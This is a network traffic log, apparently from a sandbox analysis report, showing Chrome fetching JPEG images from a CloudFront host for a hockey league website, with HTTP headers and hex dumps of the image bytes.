                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: e8 ee 33 e1 87 4d 47 0c 71 e0 05 fc ee 3c 95 5c 7c 5d 0d af 2d 81 0c b8 0e 37 b7 95 8a ee 28 f6 7d f1 39 9e 6a 8e 4f e8 77 19 5a ad a4 75 29 79 6a ad 62 6a e6 b7 37 04 bf 4e 9f 78 b8 b4 23 bc b2 e2 b2 a4 28 77 0c 94 9f 0e f8 ea 0e 9f 5f 96 ce a6 da 34 eb da d2 9e 13 54 da 93 7b db 3d 14 85 0e 4a 6d 63 eb 54 93 90 44 66 6b b8 6e 6e 82 e0 62 fc 4c 3b 38 6d d8 79 1f d0 2a ea 97 58 81 54 04 43 d1 c3 70 7f 5a 85 e8 92 16 39 80 60 90 b3 8c 85 66 38 ed af 37 9d e1 29 ad 57 cc b4 ad d9 5a 65 96 ab f3 a8 6d b6 e7 dd 4a 50 90 ea b0 00 0a c0 1e 51 f9 f3 14 5e 21 a9 f4 16 6e d9 89 4b f9 9a 3b cc a6 65 aa 81 54 df 60 a6 88 c8 58 5e 71 b4 8e 79 e9 1a 28 78 00 be 1b 22 be 65 ad ce 05 81 6f 31 7b 7d ed 55 43 b1 58 6b dc c6 c1 27 2f 23 f9 2e cd 65 43 eb 8f d3 13 72 be c8
                                                                                                                          Data Ascii: 3MGq<\|]-7(}9jOwZu)yjbj7Nx#(w_4T{=JmcTDfknnbL;8my*XTCpZ9`f87)WZemJPQ^!nK;eT`X^qy(x"eo1{}UCXk'/#.eCr
                                                                                                                          2025-01-13 21:01:20 UTC3778INData Raw: 56 b4 27 4c 75 ae 97 f2 75 fb 6d b3 34 ea 12 44 bc f3 5f 53 9b 97 f3 43 a3 9e 3c 8e 47 94 74 6c 3f 8f e3 c8 34 4b 54 81 89 0f 6b ff 00 10 1d ff 00 78 76 eb d6 56 46 ad 85 61 4d 13 1a 4c e4 7f 2e 07 e5 e8 b4 5b 45 7d 22 b7 cd a4 89 7a 1e ab d3 4d d3 4d 6c 04 09 f6 88 6e 7d b4 f8 ab eb 5d f8 e0 f9 98 dd dd 2f e2 27 47 f5 82 5d 0a b2 ef 29 37 67 14 9c aa 9f 32 ae c2 6d 1e 45 b5 73 3e f4 e4 79 c6 8d 6b 07 a3 a7 52 ed 25 cc 55 34 c6 79 ab b2 96 92 54 99 55 10 cc fb 69 f0 da 7d 87 3e f4 82 7c 23 56 2b 14 3b 8e d0 ab 2a 9d 5c a5 d4 28 f5 29 65 73 6a 61 a5 b0 ea 08 ef c1 c1 1e f8 d2 c6 c3 58 7b 14 34 c7 a6 44 0c 79 df 2f bb 0d ad dd 65 4d 0e b3 56 a2 1e 8a 75 85 cd eb f6 77 1e fb ae e9 90 73 d0 c4 c1 8e 3e 58 3c 5d f1 05 a7 49 6e 5e 8f a8 33 93 d2 6d 72 4c a5 54
                                                                                                                          Data Ascii: V'Luum4D_SC<Gtl?4KTkxvVFaML.[E}"zMMln}]/'G])7g2mEs>ykR%U4yTUi}>|#V+;*\()esjaX{4Dy/eMVuws>X<]In^3mrLT
                                                                                                                          2025-01-13 21:01:20 UTC4688INData Raw: 21 48 3d 07 28 18 82 06 60 1d 53 90 07 9c 34 00 20 c1 d9 2d d4 86 db e3 0b 0f 00 6a 91 d1 40 31 12 24 48 72 21 41 ce 1b 18 88 04 18 69 28 a0 39 c1 80 33 d2 0c 10 92 91 22 44 86 a7 22 04 18 09 83 09 25 20 8f 38 10 40 cc 24 51 c6 44 11 d2 00 83 09 22 80 e4 71 06 24 48 69 09 c1 48 3d d9 10 21 81 80 92 80 e6 21 11 31 06 01 d1 24 01 cc 30 3e 30 87 91 cc 34 22 92 68 52 31 10 1c 43 72 30 d2 2e 92 58 91 22 43 52 4a 44 08 78 04 42 49 2c 48 91 21 24 8e e8 fc db 92 da b7 ef 0a 2c d5 b9 74 52 25 6a 74 c9 e4 16 df 96 99 6c 2d 0b 1e e3 d0 f8 11 cc 77 47 e8 c4 80 d7 39 8e 0e 69 b1 08 90 1c 32 bb 65 cd be 25 78 00 b8 6c a5 4d 5e 3a 34 dc c5 72 84 37 3a f5 24 fb 73 92 69 ea 7b 3f f1 c8 1f 84 3c 0f 58 d5 5b 42 f4 bc b4 d6 e2 6a e0 b4 6b 73 d4 5a b4 9a f1 da 32 a2 85 72 3c
                                                                                                                          Data Ascii: !H=(`S4 -j@1$Hr!Ai(93"D"% 8@$QD"q$HiH=!!1$0>04"hR1Cr0.X"CRJDxBI,H!$,tR%jtl-wG9i2e%xlM^:4r7:$si{?<X[BjksZ2r<


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          116192.168.11.204994254.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC672OUTGET /app/uploads/gthl/2024/12/02164945/AROUND-THE-G-TITLE-November-2024-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 71079
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 17:00:33 GMT
                                                                                                                          ETag: "4b609d04ebe6ce1bebb6d4708144d110"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 6f18ca2e5109f8aa7cd1212932dc4e9a.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: HGUgyof6To__Sm67bItpLTJzwTZ8ZoAdRpDzNUGHPmxhhKYw0_sBbQ==
                                                                                                                          2025-01-13 21:01:20 UTC5499INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 60 10 00 01 03 03 02 04 04 03 04 06 06 05 04 0c 0b 09 01 02 03 04 00 05 11 06 21 07 12 31 41 08 13 51 61 14 22 71 09 32 81 91 15
                                                                                                                          Data Ascii: JFIF&&CC"`!1AQa"q2
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 8e c8 8e 4a 50 e0 19 4f 29 3b 0c 7b 54 72 4d 38 ec 59 a7 4e 13 df 83 16 d5 b6 19 3a 6a ec bb 6c 87 d0 e6 00 50 28 e9 83 51 8c dc 64 30 9f 29 0e 7c a7 b5 5e b8 dc a6 57 a9 d0 f3 2e a5 5c ec 8c 80 9c 62 b3 8c 8c 8f 6a 9e 27 d7 05 d4 57 99 28 64 74 5e f4 4c 29 d7 e1 31 b6 d6 e2 50 c2 39 c9 42 32 4a 8f 4c d6 8b 32 c1 7e 77 4b c0 66 5e 4c 95 64 63 27 a7 6a 84 e0 1d fe d3 67 6a ea 89 ab 40 75 d5 36 53 cd fb a3 fe ba d1 b5 26 a9 b3 2a 5b 65 ab 83 2a f2 d3 cc 47 36 d5 8b 50 ea 54 8e 8e 92 0d c1 4b cc cb 64 69 7b e4 25 c6 fd 1e b0 b9 2b 51 0e b5 ca 47 2f a6 0f 7a b4 b7 67 b8 46 87 9b 99 4a 55 cb 9c 03 9a b8 43 d6 76 27 a1 fc 43 7e 57 98 06 32 46 e2 a9 1a 93 52 2a e1 20 b6 c2 c9 04 e2 a8 9c db d9 1a a1 87 a5 37 27 b1 9d 6a eb 69 93 3b 2c 27 27 a6 40 a5 ac 90 c3 50
                                                                                                                          Data Ascii: JPO);{TrM8YN:jlP(Qd0)|^W.\bj'W(dt^L)1P9B2JL2~wKf^Ldc'jgj@u6S&*[e*G6PTKdi{%+QG/zgFJUCv'C~W2FR* 7'ji;,''@P
                                                                                                                          2025-01-13 21:01:20 UTC8695INData Raw: c7 b9 ec 7d 8d 56 d8 e4 e6 2b 24 90 36 04 56 e7 a1 b8 c3 a7 b8 81 66 1a 7a f8 cc 76 a7 bb cc 97 58 74 fc 8e a7 b6 09 ea 71 58 de b7 b6 b3 a6 75 8c fb 14 67 53 f0 e4 85 34 07 44 05 0c 84 e7 bf 5a 92 93 4f a5 90 a4 d5 a2 06 e9 3d 2d 47 58 67 ef 38 76 fa 55 61 59 25 45 5b 93 53 d7 0f 81 43 a5 6f 15 38 a3 b7 28 d9 22 9b 21 bb 44 90 41 4a d9 3d b9 4e 47 f1 a9 c7 61 4b 72 18 9d e8 0e fb 13 d6 ac 92 34 4d c9 c8 eb 99 69 71 b9 cc a0 65 61 b3 f3 a7 ea 9a af a1 b5 07 08 5a 48 28 eb 91 8c 1a 9d db 22 02 80 cf d2 bd 8e 6c 27 d6 bc af 4e be d4 fe cf 09 73 a6 b4 ca 3f 69 69 4f f1 a7 c8 8d 86 d7 6d 31 b4 a4 08 89 47 2e 59 04 9c 7a 8c 9a a7 5e 2c 4c dc a4 29 2b 18 52 4f 2a 54 3d 07 7a d8 66 db 1b 6a d8 d3 00 6f e5 a5 03 d8 62 a9 86 d0 12 f3 d2 53 f7 13 f2 a3 35 5b 95 3b
                                                                                                                          Data Ascii: }V+$6VfzvXtqXugS4DZO=-GXg8vUaY%E[SCo8("!DAJ=NGaKr4MiqeaZH("l'Ns?iiOm1G.Yz^,L)+RO*T=zfjobS5[;
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 88 ad 5d c3 1d 0c ee 99 45 9a ca ec 74 44 4c bb 40 75 cc 2e 3b 6b 39 5f 38 cf cc a3 da a8 df 68 9e b9 bd f1 53 c3 67 86 ce 27 ea 86 60 fe 9d d4 76 fb 84 a9 ee c6 60 34 95 2d 48 60 e1 23 7c 27 3d b3 54 df b4 37 44 1b a7 8b 1d 79 72 4b 85 05 c7 e2 90 31 90 7f d1 5a 15 3f e3 62 d9 22 2f 83 3f 0b 11 fc 92 b3 16 d1 39 2b 20 64 0f 91 8a be 39 94 9c 97 91 9e 58 65 05 19 79 93 9e 07 38 97 a8 f8 27 e0 6f 8f 5c 59 d1 0c c0 4e a1 b1 de 2d ea 8a ec b8 c1 e4 7c de 4a 08 52 72 0a 86 1c 56 06 7a 9a aa 69 2f b5 df c4 a4 4d 51 6a 7f 5b c3 d2 97 4d 3e 99 4d fe 93 87 1e ce 19 75 e8 d9 fd 62 50 be 73 ca ae 5c e3 6e b4 3e 1d f2 af b3 47 c4 8f 36 3f f9 5a db d3 fd b8 f5 c3 61 24 91 b6 49 db 7a b9 3d 8a b6 b3 ad 7e d0 0f 0f 9a 73 43 ea 9b 4f 1e f8 44 1b 93 c3 0e 29 35 fa 52 d8
                                                                                                                          Data Ascii: ]EtDL@u.;k9_8hSg'`v`4-H`#|'=T7DyrK1Z?b"/?9+ d9Xey8'o\YN-|JRrVzi/MQj[M>MubPs\n>G6?Za$Iz=~sCOD)5R
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 97 10 b0 08 20 fa d7 27 71 2f 46 ab 46 6a 27 20 34 85 18 32 01 76 22 95 bf cb dd 39 f6 3b 7e 55 d3 e9 98 b2 b3 e6 12 49 eb 9a a4 f1 6b 4e b7 a9 f4 9b ea 6d 00 cb 82 0c 86 14 3a ed d5 3f 88 ff 00 0a b3 16 4a 7b 11 94 6b 73 99 1c 6d 48 ed b7 ad 2b 1e 7c db 7a b9 a1 4b 79 85 9e a5 b5 94 93 f9 51 db 29 71 1c aa 1b 1d 8e f4 cd d6 d6 da d4 85 0d c5 59 93 60 27 61 eb cd 5d 01 40 c6 d4 13 07 2f 4e 65 f3 0f e3 53 c8 e3 46 be 4a 12 9f d2 ad 9c 00 32 58 4e 4f f0 aa 08 df bd 5e 60 70 ca f5 36 0c 79 8d b0 79 5f 69 0e a7 6e ca 00 ff 00 8d 66 93 4b 92 70 4e 47 42 e9 fb 7a 2d 56 74 47 29 08 71 d2 5e 77 d4 a8 ff 00 c3 14 4b 9e 3e 1c b8 a2 79 73 83 8f 4a 64 ee a1 4f c6 fc 3a 51 f7 81 c1 55 32 76 54 89 51 5e 6d 4a 51 29 51 d8 1e d5 ca 9c ba b7 3d 06 3c 6a 09 22 ad ac f4 62
                                                                                                                          Data Ascii: 'q/FFj' 42v"9;~UIkNm:?J{ksmH+|zKyQ)qY`'a]@/NeSFJ2XNO^`p6yy_infKpNGBz-VtG)q^wK>ysJdO:QU2vTQ^mJQ)Q=<j"b
                                                                                                                          2025-01-13 21:01:21 UTC7733INData Raw: d4 de 56 d6 48 f4 a7 c0 b9 09 25 01 c0 56 40 56 6a 97 aa ac 71 6e f6 f7 e0 4a 6b 99 a7 07 6e a0 f6 22 ad 42 4a d2 a3 90 52 3a 60 d3 79 08 6e 40 38 c0 3e 86 93 dc 6b 63 3a b3 68 ab 3d 96 2a 5d 66 dc 1c 3c bf 33 ab 19 51 3f e1 56 98 08 6d 49 69 b8 ec 84 84 2b 3b 26 9c b2 b9 31 df 0c 36 94 a9 04 fc c8 58 db 15 23 29 c7 de 69 28 84 52 ce 06 e9 4a 71 9a 2a c4 9e f6 26 89 3c 8b 5a 14 bc 94 f4 1e d4 a7 c5 72 a3 99 5d ea 36 59 0c cc 2a 71 d4 02 b6 f9 70 15 9c 1a 42 5b f2 15 6b 5b b1 ca 54 f7 21 23 27 6e 6a e7 38 b8 f2 77 21 28 e5 54 98 7b 8d cd 08 25 a6 bf 5a fe 32 96 d3 d7 ea 7d 2a c9 03 cc f8 08 ca 7c 61 7e 52 79 87 bd 67 5a 56 db 70 61 c7 66 5c de 0b 71 79 24 9e b9 ad 36 de 84 b9 06 32 c1 c8 2d 83 5a f1 43 d4 b3 06 ae 55 93 a5 3d 90 e5 a0 92 91 8d c9 a7 4d a4
                                                                                                                          Data Ascii: VH%V@VjqnJkn"BJR:`yn@8>kc:h=*]f<3Q?VmIi+;&16X#)i(RJq*&<Zr]6Y*qpB[k[T!#'nj8w!(T{%Z2}*|a~RygZVpaf\qy$62-ZCU=M


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          117192.168.11.204994354.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC431OUTGET /app/uploads/gthl/2023/07/13145939/5HealthySnacks-1024x512jpg-730x365.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 98422
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Thu, 13 Jul 2023 18:59:40 GMT
                                                                                                                          ETag: "3505b35843be9fbc0dfa7af75c0ae9bb"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 d439433d975e4e608c1677c8e16e7fe2.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: yeg_H8NWBxOlG5N6Xpi0dNiPFun-NdJiTnGo64-XwUrntG8lEc1fuQ==
                                                                                                                          2025-01-13 21:01:20 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 18 e2 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 21 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 93 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 00 01 2c 00 00 00 01 00 00 01 2c 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 33 3a 30 37 3a 31 33 20 31 34 3a 35 39 3a 32 32 00 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 04 00 a0 03 00 04 00 00 00 01 00 00 02 00 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00
                                                                                                                          Data Ascii: JFIF,,ExifMM*bj(1!r2i,,Adobe Photoshop 24.0 (Macintosh)2023:07:13 14:59:22
                                                                                                                          2025-01-13 21:01:20 UTC93INData Raw: 18 71 f8 9d 88 f2 71 79 bf 05 ee f4 5d 25 b4 a9 dd dd 99 96 67 8b 4e 71 16 51 d9 b8 6e 89 e0 b0 dc 94 76 a4 b3 7e 0b 87 bf 48 55 9e d3 b2 d0 dd c7 03 69 b9 d2 76 01 ac 98 d1 5e bc 69 46 ef b1 6f 65 71 83 93 b2 11 ba b7 0b a9 42 6c 66 15 a8 6c 6c 6f e9 8e 26 22 ad 57 55 42 39 d5
                                                                                                                          Data Ascii: qqy]%gNqQnv~HUiv^iFoeqBlfllo&"WUB9
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 7a 70 82 e3 d6 6a 84 63 b3 77 f6 af 10 eb a6 4d a0 84 82 b7 15 a8 6d 51 df 1b 5b 86 06 92 a7 05 b5 37 de df 16 55 9d 59 6d 3c 90 95 c5 71 2b 21 47 8c 98 5f 6c 53 b3 98 47 26 b4 f9 09 da 4f 6a ac b5 b6 ef f4 c7 87 59 a6 0b 6d 65 94 57 cb b0 f6 65 42 00 7a 60 8e 48 d0 9e f5 02 37 e1 b0 0a 0b 97 c5 b5 96 8b 74 51 4c eb 5f 99 4f f2 c4 d3 13 0b 9d 25 0d 9c c6 46 b5 6f 8e 5e 33 1d 53 1f 27 4e 93 d9 a6 b5 7c 7e 6e 5b cb e9 52 54 56 d4 b3 90 53 8a 6d 96 f8 b1 74 a3 68 1a d4 7f 9f 14 64 af 52 95 1a 5c 92 ca 3b d6 f7 d7 d3 e0 ba cb 60 a5 29 6d 3c df cf 9d 21 5c 70 40 49 29 05 5d e3 7b 13 ce 79 e3 03 c5 5a cf 67 3f e3 1d cb a7 a5 f5 96 72 77 bd 9f 5b 35 5c c8 67 df 5d 51 53 8a 36 04 69 24 ee 48 da 62 74 27 27 37 3f ba 6f 57 c3 a1 7e 3b 38 8f 93 bf 36 39 2f 99 b3 63
                                                                                                                          Data Ascii: zpjcwMmQ[7UYm<q+!G_lSG&OjYmeWeBz`H7tQL_O%Fo^3S'N|~n[RTVSmthdR\;`)m<!\p@I)]{yZg?rw[5\g]QS6i$Hbt''7?oW~;869/c
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 44 19 49 a4 f6 ae a0 e8 f6 8e 8d 22 35 51 c4 d4 a7 cd 97 3a 3e 3f 92 fa 55 6a 51 c9 73 a3 c0 6e 4b 8e d3 1c 54 95 59 a4 99 77 8e 97 00 f7 b5 ee 3f 15 5c e2 34 35 1a 9f b9 41 e6 b7 6f 5e e8 d6 e2 ab 2e 52 83 e7 2e f5 ee ba 05 ed 55 9c a3 ac 31 38 e1 98 91 59 01 b9 93 db 37 7d 41 7e a5 78 e2 0a 8c 6b f3 e9 e5 25 bb db d5 19 65 86 55 d6 d5 35 69 ef 5c 7a bd 87 14 95 31 77 58 49 71 93 a5 6d 8d 36 1b d3 bc 73 78 b9 eb 77 d1 e4 fe 7c f3 e8 c8 ed 2e 6c b2 7c 7d fe 75 8e 12 cf a6 e8 79 0a 4a d0 e0 d0 a2 74 28 6e 27 7e e3 e3 8c d5 29 b9 a6 e1 94 96 ab db d5 77 19 67 07 9c 5e 4d 7c f8 8d 26 67 0d 02 68 54 14 d2 9d 90 73 92 f2 80 e5 b1 a7 6e f1 e6 89 51 4b 11 0d 98 3b 4d 6e dc fa b8 32 74 e9 7e a6 1c 8d ed 35 a7 06 3a b8 ea 65 88 a8 30 52 fc 8b e9 05 dc cd 20 a4 f7
                                                                                                                          Data Ascii: DI"5Q:>?UjQsnKTYw?\45Ao^.R.U18Y7}A~xk%eU5i\z1wXIqm6sxw|.l|}uyJt(n'~)wg^M|&ghTsnQK;Mn2t~5:e0R
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 93 7b 79 7c f9 72 72 93 db cb e7 cb 89 27 27 56 94 bd 32 b2 12 a7 5c 19 ba 2e 33 46 af e7 9a 34 50 a6 94 92 5b bc cb e9 51 4d a8 2d c8 66 7c bc 52 a2 1c cd 71 62 e7 6a ba 39 ff 00 8c 6d 8b 4d dd ab 9b a0 a3 c3 24 13 2e 5a 6c a7 8c 4c ca 5e 20 df 95 60 79 f7 c4 e6 a4 f4 b5 8b 26 9b d2 d6 0c 2f 24 ba 2e e2 94 2f 60 54 2c a4 9d d7 88 28 bb 68 45 41 db 41 cd c4 25 e6 d0 e9 d3 c6 0e 2d 77 f8 5b 0f 5d 8f 8b 9e 32 26 e2 dc 78 66 63 8b 71 6e 3c 33 42 ba 19 33 52 4f c8 a8 92 ec b7 be b0 4e b0 36 8f e7 7c 3c 56 8a a7 63 28 c5 a5 0a 8a aa d2 59 30 cc 4c a0 a5 4a d4 11 a1 4a 09 72 e3 7f 6a 62 bc 26 9b 0f ab b8 8f d3 d5 94 a8 be af 54 26 71 7c 72 5a 7c 0b 17 5b 0a b7 4f fe 20 b5 9b 8f 06 5b 15 b2 dc 78 33 75 94 bb 4c 61 60 e8 cf 52 0f 92 25 6b 54 7d 48 4a f1 ab 25 d4
                                                                                                                          Data Ascii: {y|rr''V2\.3F4P[QM-f|Rqbj9mM$.ZlL^ `y&/$./`T,(hEAA%-w[]2&xfcqn<3B3RON6|<Vc(Y0LJJrjb&T&q|rZ|[O [x3uLa`R%kT}HJ%
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 96 3b 85 2d 4f dc ec 8d 55 90 15 9a a9 a7 19 97 1c f7 58 27 cd 0d 89 14 2a 22 48 b2 bc 09 64 38 cc 4b 88 a7 88 fb 4c a3 6d 83 f2 97 7f d9 86 84 ce 57 85 d4 80 93 ca fb ef 01 6e ca 93 61 de 92 06 6f ec c0 c6 88 52 10 17 8b 82 05 4f b3 72 4a 25 49 e5 49 cf 3c df 51 b2 87 9c c3 42 64 05 c2 d3 bb 1c ef 82 b1 e8 c2 63 44 35 00 16 f3 81 1f e0 e6 24 f0 b6 bd 03 02 13 17 f0 b0 ca 3e 2a c0 4e e1 d1 86 eb 0f d3 84 d2 5e 2f 71 60 1c fb 66 da f7 07 79 86 c1 15 f3 ec 8b ca 97 e5 7c ef e8 a3 d9 08 64 c9 c1 73 2a f8 d3 1c e3 b9 ca 7e 21 ae cc 54 25 5b 91 53 a9 6d c0 90 02 82 92 2f a0 73 98 00 e2 78 64 77 57 67 e8 d6 7d 25 c0 04 13 00 1d 5d 2a 84 6a 19 39 af d5 10 8b aa 9d 3d 26 54 a1 b1 0b 4b a9 3e 5c d8 00 e5 20 02 50 e0 d9 88 ff 00 a3 79 60 a1 b8 b5 e6 b3 38 b5 49 39
                                                                                                                          Data Ascii: ;-OUX'*"Hd8KLmWnaoROrJ%II<QBdcD5$>*N^/q`fy|ds*~!T%[Sm/sxdwWg}%]*j9=&TK>\ Py`8I9
                                                                                                                          2025-01-13 21:01:21 UTC6603INData Raw: 42 5f eb 13 00 1e 98 54 7e e1 9a f9 a5 f9 8c 48 89 e5 f4 ff 00 dd d3 1f 3a af 39 88 92 08 80 0f 40 f0 3f f6 76 93 ff 00 97 9c fa a5 43 11 e7 e9 d6 61 0c c4 00 7a 73 83 3f 04 28 9e 02 c7 a0 21 88 7a 80 46 20 03 30 0c 83 f8 60 f7 22 3f 48 31 fb 50 80 a3 90 0c 91 78 3c f7 65 c2 fe 15 fb 26 00 2d 97 0a 8e e2 f5 7f 9d 63 eb 04 00 50 88 00 ee 32 23 dd 6f 09 fd 24 cf 9e 00 26 6e 1b ff 00 7d f0 bf cc 3f e9 26 00 2b 0c 00 58 6e 05 5d d0 ea ff 00 46 1f ac 44 00 49 3c 35 3b 9e d2 7e 92 1f 56 a8 00 a6 10 01 27 f0 6a ee d3 87 3e 71 cf ab 54 00 4d 7c 37 fe f0 61 7f 0a 7f d0 4c 00 54 58 00 10 00 ff 00 80 67 8d 37 1c 61 f9 c0 6d c4 d4 25 d4 4f 37 18 2f e4 80 0b 8f c2 f6 7f b1 b2 3e e3 20 db b2 e7 58 6f a6 c4 ab f6 60 02 8c c0 00 80 0c 8d 62 00 2f 66 5b 3f b3 53 ff 00 47
                                                                                                                          Data Ascii: B_T~H:9@?vCazs?(!zF 0`"?H1Px<e&-cP2#o$&n}?&+Xn]FDI<5;~V'j>qTM|7aLTXg7am%O7/> Xo`b/f[?SG
                                                                                                                          2025-01-13 21:01:21 UTC1416INData Raw: 02 a0 9b cc 8b 93 32 e3 0b 13 28 67 b2 5c b2 d2 4e cd 16 ea 89 ba 51 12 93 0b 9c 43 b4 f6 f8 c4 10 e2 49 00 a9 43 4a 6f b6 14 a9 25 9a 24 a7 7d 44 d3 f8 7a 42 62 d3 53 6d 22 69 77 4d f8 d6 d2 7a 36 6c bc 4d b7 08 f3 5d 88 64 f5 46 9f d1 9a 23 8b 09 4d 32 4d 0a 5d ee a4 b2 9b f3 ec 8a e9 d4 a9 27 9c 98 3a 70 5b 83 65 29 ac 52 6a 72 d2 d2 a9 08 67 31 6a 08 4a 42 40 3b 6c 00 8b 9e 6e ed 89 24 95 90 ba 76 94 dc eb e8 79 4e ba 85 25 39 bc 92 2d 15 d5 a3 1a 9f 71 28 c9 ad 06 c9 69 55 4c ce 38 d2 96 54 86 94 40 27 f9 d7 1c 2a df 4d 9d 7a 8e 9a ca 08 d5 1c 42 8c 7a 47 70 5b 96 4f 12 ca 33 d7 f0 47 9c 98 e9 53 8d 2c 2c 79 1a 11 bb e1 ea d9 4b 4e 7c e9 3c 81 c5 ce 1d 3c 73 43 9b 33 57 96 25 c9 e2 9e 7b 6b bb f2 1b 54 b8 78 8a 63 71 48 5b da 84 4a 24 26 15 13 20 88
                                                                                                                          Data Ascii: 2(g\NQCICJo%$}DzBbSm"iwMz6lM]dF#M2M]':p[e)Rjrg1jJB@;ln$vyN%9-q(iUL8T@'*MzBzGp[O3GS,,yKN|<<sC3W%{kTxcqH[J$&
